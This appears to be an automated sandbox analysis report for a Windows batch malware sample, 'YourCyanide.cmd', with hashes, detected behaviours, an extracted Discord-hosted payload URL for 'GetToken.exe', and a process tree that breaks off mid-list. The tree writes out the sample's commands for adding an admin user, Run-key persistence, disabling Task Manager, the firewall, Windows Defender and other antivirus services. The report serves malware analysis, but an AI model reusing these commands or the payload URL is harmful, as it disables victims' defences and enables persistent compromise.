Analysis
-
max time kernel
52s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18-05-2022 00:35
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.cmd
Resource
win10v2004-20220414-en
General
-
Target
YourCyanide.cmd
-
Size
90KB
-
MD5
4cb725f17bec289507f9e8249c8ea80e
-
SHA1
a7034e84cb884bf90e61ce3b621424bec57334ae
-
SHA256
1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
-
SHA512
776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Malware Config
Extracted
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 19 4540 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
netsh.exepid process 2428 netsh.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
reg.exereg.exenetsh.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4964_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_5072_toolbar = "ycynlog.cmd" reg.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run netsh.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" netsh.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 4692 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3016 taskkill.exe -
Modifies registry class 21 IoCs
Processes:
powershell.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 4 IoCs
Processes:
cmd.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 cmd.exe File opened for modification C:\Users\Admin\%ONRsX:~13 cmd.exe File opened for modification C:\Users\Admin\%onRsx:~13 cmd.exe File opened for modification C:\Users\Admin\%RafEw:~4 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 57 IoCs
Processes:
powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exepowershell.exenetsh.exepowershell.exenetsh.exenetsh.exenetsh.exepowershell.exenetsh.exenetsh.exepowershell.exepid process 4252 powershell.exe 4252 powershell.exe 4252 powershell.exe 3180 tskill.exe 3180 tskill.exe 4576 tskill.exe 4576 tskill.exe 4912 tskill.exe 4912 tskill.exe 2560 tskill.exe 2560 tskill.exe 1264 tskill.exe 1264 tskill.exe 3484 tskill.exe 3484 tskill.exe 4700 tskill.exe 4700 tskill.exe 4076 tskill.exe 4076 tskill.exe 2812 tskill.exe 2812 tskill.exe 4056 tskill.exe 4056 tskill.exe 4704 tskill.exe 4704 tskill.exe 3132 tskill.exe 3132 tskill.exe 176 tskill.exe 176 tskill.exe 4540 powershell.exe 4540 powershell.exe 4540 powershell.exe 4060 powershell.exe 4060 powershell.exe 2220 netsh.exe 2220 netsh.exe 2220 netsh.exe 1264 powershell.exe 1264 powershell.exe 1264 powershell.exe 4060 netsh.exe 3132 netsh.exe 3132 netsh.exe 2220 netsh.exe 1264 powershell.exe 4060 netsh.exe 2652 powershell.exe 2652 powershell.exe 3132 netsh.exe 2652 powershell.exe 3132 netsh.exe 2012 netsh.exe 2012 netsh.exe 2012 netsh.exe 2564 powershell.exe 2564 powershell.exe 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exetaskkill.exepowershell.exepowershell.exenetsh.exepowershell.exenetsh.exepowershell.exenetsh.exepowershell.exedescription pid process Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 3016 taskkill.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 2220 netsh.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeDebugPrivilege 3132 netsh.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2012 netsh.exe Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2652 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.execmd.execmd.exenet.exenet.exedescription pid process target process PID 1928 wrote to memory of 4872 1928 cmd.exe attrib.exe PID 1928 wrote to memory of 4872 1928 cmd.exe attrib.exe PID 1928 wrote to memory of 4704 1928 cmd.exe rundll32.exe PID 1928 wrote to memory of 4704 1928 cmd.exe rundll32.exe PID 1928 wrote to memory of 4812 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 4812 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 1484 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 1484 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 1620 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 1620 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 444 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 444 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 724 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 724 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 4252 1928 cmd.exe powershell.exe PID 1928 wrote to memory of 4252 1928 cmd.exe powershell.exe PID 1928 wrote to memory of 4724 1928 cmd.exe net.exe PID 1928 wrote to memory of 4724 1928 cmd.exe net.exe PID 4724 wrote to memory of 4636 4724 net.exe net1.exe PID 4724 wrote to memory of 4636 4724 net.exe net1.exe PID 1928 wrote to memory of 2020 1928 cmd.exe reg.exe PID 1928 wrote to memory of 2020 1928 cmd.exe reg.exe PID 1928 wrote to memory of 4412 1928 cmd.exe reg.exe PID 1928 wrote to memory of 4412 1928 cmd.exe reg.exe PID 1928 wrote to memory of 5036 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 5036 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 3476 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 3476 1928 cmd.exe cmd.exe PID 1928 wrote to memory of 4644 1928 cmd.exe net.exe PID 1928 wrote to memory of 4644 1928 cmd.exe net.exe PID 4644 wrote to memory of 3956 4644 net.exe net1.exe PID 4644 wrote to memory of 3956 4644 net.exe net1.exe PID 3476 wrote to memory of 2928 3476 cmd.exe scrnsave.scr PID 3476 wrote to memory of 2928 3476 cmd.exe scrnsave.scr PID 5036 wrote to memory of 1560 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 1560 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 256 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 256 5036 cmd.exe scrnsave.scr PID 3476 wrote to memory of 1764 3476 cmd.exe scrnsave.scr PID 3476 wrote to memory of 1764 3476 cmd.exe scrnsave.scr PID 5036 wrote to memory of 3704 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 3704 5036 cmd.exe scrnsave.scr PID 3476 wrote to memory of 2080 3476 cmd.exe scrnsave.scr PID 3476 wrote to memory of 2080 3476 cmd.exe scrnsave.scr PID 1928 wrote to memory of 3016 1928 cmd.exe taskkill.exe PID 1928 wrote to memory of 3016 1928 cmd.exe taskkill.exe PID 5036 wrote to memory of 4568 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 4568 5036 cmd.exe scrnsave.scr PID 3476 wrote to memory of 3904 3476 cmd.exe scrnsave.scr PID 3476 wrote to memory of 3904 3476 cmd.exe scrnsave.scr PID 5036 wrote to memory of 2496 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 2496 5036 cmd.exe scrnsave.scr PID 1928 wrote to memory of 4856 1928 cmd.exe net.exe PID 1928 wrote to memory of 4856 1928 cmd.exe net.exe PID 4856 wrote to memory of 4376 4856 net.exe net1.exe PID 4856 wrote to memory of 4376 4856 net.exe net1.exe PID 3476 wrote to memory of 1276 3476 cmd.exe scrnsave.scr PID 3476 wrote to memory of 1276 3476 cmd.exe scrnsave.scr PID 5036 wrote to memory of 1660 5036 cmd.exe scrnsave.scr PID 5036 wrote to memory of 1660 5036 cmd.exe scrnsave.scr PID 1928 wrote to memory of 4960 1928 cmd.exe net.exe PID 1928 wrote to memory of 4960 1928 cmd.exe net.exe PID 4960 wrote to memory of 2584 4960 net.exe net1.exe PID 4960 wrote to memory of 2584 4960 net.exe net1.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1624 attrib.exe 4872 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:4872 -
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:4704
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4812
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1484
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1620
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:444
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:4636
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4964_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:2020 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:4412
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1560
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:256
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3704
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4568
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2496
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1660
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4180
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2916
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5108
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3984
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3056
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4128
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2560
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4092
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:940
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4724
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1560
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4332
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4044
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3748
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2256
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2316
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1868
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2180
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1892
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4052
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4208
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3548
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3132
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:660
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4192
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:508
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4072
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1764
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5084
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3012
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1964
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3992
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3716
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3820
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4300
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3180
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3308
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4092
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4716
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1544
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4348
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4196
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1088
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3424
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2160
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4060
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5028
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1592
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2460
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:3956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2928
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1764
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2080
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3904
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1276
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2220
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1860
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4900
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1844
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3724
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3968
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3548
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3860
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4704
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4192
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1740
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1280
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4532
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2356
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1088
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4660
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2556
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4924
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3992
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4060
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1884
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2560
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4872
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4760
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:212
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2996
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4456
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1428
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1416
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:768
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4900
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4316
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4572
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3004
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3556
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1580
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2216
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2176
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1348
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2124
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4252
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:320
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3392
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1788
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2628
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2024
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1580
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3448
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4732
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:4376
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:2584
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵PID:4604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:1444
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:3768
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:4016
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:1408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:3140
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:3076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:2868
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:3528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:2216
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:3732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:428
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:4872
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:2504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:5016
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:1724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:1856
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:4408
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:1968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:2460
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:3372
-
